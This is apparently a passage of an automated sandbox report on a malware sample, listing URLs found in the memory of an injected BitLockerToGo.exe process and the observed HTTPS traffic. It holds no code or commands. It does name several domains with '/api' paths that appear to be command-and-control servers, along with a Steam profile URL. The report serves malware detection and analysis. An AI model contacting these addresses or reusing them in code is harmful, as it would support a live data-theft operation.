Source: BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://caffegclasiqwp.shop/
Source: BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://caffegclasiqwp.shop/?Sd
Source: BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://caffegclasiqwp.shop/api
Source: BitLockerToGo.exe, 00000002.00000002.1754207920.000000000288F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.a
Source: BitLockerToGo.exe, 00000002.00000002.1754207920.000000000288F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akam
Source: BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamaC
Source: BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/puS
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PA
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: BitLockerToGo.exe, 00000002.00000002.1754207920.000000000288F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/p
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: BitLockerToGo.exe, 00000002.00000002.1754207920.000000000288F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=engli0
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: BitLockerToGo.exe, 00000002.00000002.1754207920.000000000288F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: BitLockerToGo.exe, 00000002.00000003.1748418926.00000000027F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: BitLockerToGo.exe, 00000002.00000002.1754207920.000000000288F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=
Source: BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: BitLockerToGo.exe, 00000002.00000003.1725358441.0000000002851000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/
Source: BitLockerToGo.exe, 00000002.00000003.1725358441.0000000002851000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1725358441.0000000002835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/api
Source: BitLockerToGo.exe, 00000002.00000003.1725565582.0000000002815000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1725358441.0000000002815000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nippydxmnwquo.shop/api
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	String found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictnot
Source: BitLockerToGo.exe, 00000002.00000003.1753546592.000000000289F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002834000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.0000000002815000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1754207920.0000000002889000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/apiK
Source: BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/apiz;
Source: BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/h
Source: BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/~
Source: BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stagedchheiqwo.shop/
Source: BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stagedchheiqwo.shop/api
Source: BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stamppreewntnq.shop/
Source: BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: BitLockerToGo.exe, 00000002.00000003.1748418926.00000000027F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: BitLockerToGo.exe, 00000002.00000003.1748278147.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/le
Source: BitLockerToGo.exe, 00000002.00000003.1748278147.0000000002885000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/acce_
Source: BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002834000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/accek
Source: BitLockerToGo.exe, 00000002.00000003.1748278147.0000000002870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49705 version: TLS 1.2
